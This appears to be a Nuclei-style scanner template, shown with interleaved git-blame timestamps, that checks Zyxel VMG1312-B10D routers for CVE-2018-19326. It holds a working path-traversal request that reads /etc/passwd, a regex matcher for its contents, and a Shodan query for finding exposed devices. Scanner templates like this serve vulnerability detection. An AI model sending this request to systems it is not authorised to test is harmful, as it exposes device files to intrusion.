2022-05-11 23:04:44 +00:00
id : CVE-2018-19326
info :
2022-06-13 18:52:47 +00:00
name : Zyxel VMG1312-B10D 5.13AAXA.8 - Local File Inclusion
2022-05-11 23:04:44 +00:00
author : 0x_Akoko
severity : high
2022-06-20 13:04:44 +00:00
description : |
Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
reference :
2022-05-11 23:04:44 +00:00
- https://www.exploit-db.com/exploits/45904
- https://www.cybersecurity-help.cz/vdb/SB2018120309
2022-05-12 10:22:11 +00:00
- https://www.zyxel.com/homepage.shtml
2022-05-17 09:18:12 +00:00
- https://gist.github.com/numanturle/4988b5583e5ebe501059bd368636de33
2022-06-13 18:52:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-19326
2022-05-11 23:04:44 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2018-19326
cwe-id : CWE-22
2022-05-12 10:22:11 +00:00
metadata :
2022-05-17 09:18:12 +00:00
verified : true
2022-06-20 16:23:25 +00:00
shodan-query : http.html:"VMG1312-B10D"
2022-05-12 10:22:11 +00:00
tags : cve,cve2018,zyxel,lfi,modem,router
2022-05-11 23:04:44 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/../../../../../../../../../../../../etc/passwd"
2022-05-12 10:22:11 +00:00
matchers-condition : and
2022-05-11 23:04:44 +00:00
matchers :
- type : regex
2022-05-12 10:22:11 +00:00
part : body
2022-05-11 23:04:44 +00:00
regex :
- "root:.*:0:0:"
2022-05-12 10:22:11 +00:00
- type : word
part : header
words :
- "application/octet-stream"
2022-06-13 18:52:47 +00:00
# Enhanced by mp on 2022/06/13